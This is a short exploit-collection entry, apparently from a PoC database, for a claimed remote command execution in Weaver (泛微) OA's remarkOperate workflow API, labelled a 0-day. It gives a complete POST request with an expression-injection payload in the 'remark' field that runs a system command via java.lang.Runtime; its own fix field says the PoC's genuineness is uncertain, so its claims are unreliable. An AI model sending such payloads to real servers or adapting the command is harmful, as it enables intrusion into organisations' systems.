vendor = "泛微"
name = "泛微remarkOperate远程命令执行"
type = "RCE"
version = "未知"
path = "/api/workflow/reqform/remarkOperate"
detail = "POST /api/workflow/reqform/remarkOperate { \"operate\": \"save\", \"field5\": \"5241,5240\", \"IsBeForwardSubmitAlready\": \"1\", \"IsBeForwardAlready\": \"0\", \"IsSubmitedOpinion\": \"1\", \"IsBeForwardTodo\": \"0\", \"forwardflag\": \"1\", \"requestid\": \"5288726\", \"nodeid\": \"11995\", \"f_weaver_belongto_userid\": \"5240\", \"f_weaver_belongto_usertype\": \"0\", \"signworkflowids\": \"\", \"signdocids\": \"\", \"remarkLocation\": \"\", \"remark\": \"${T(java.lang.Runtime).getRuntime().exec('ping baidu.com')}\", \"remindTypes\": \"0,2\" }"
fix = "洞存在，但poc不确定真假"
date = "0704"
label = "0day"
verifier = "AdySec"
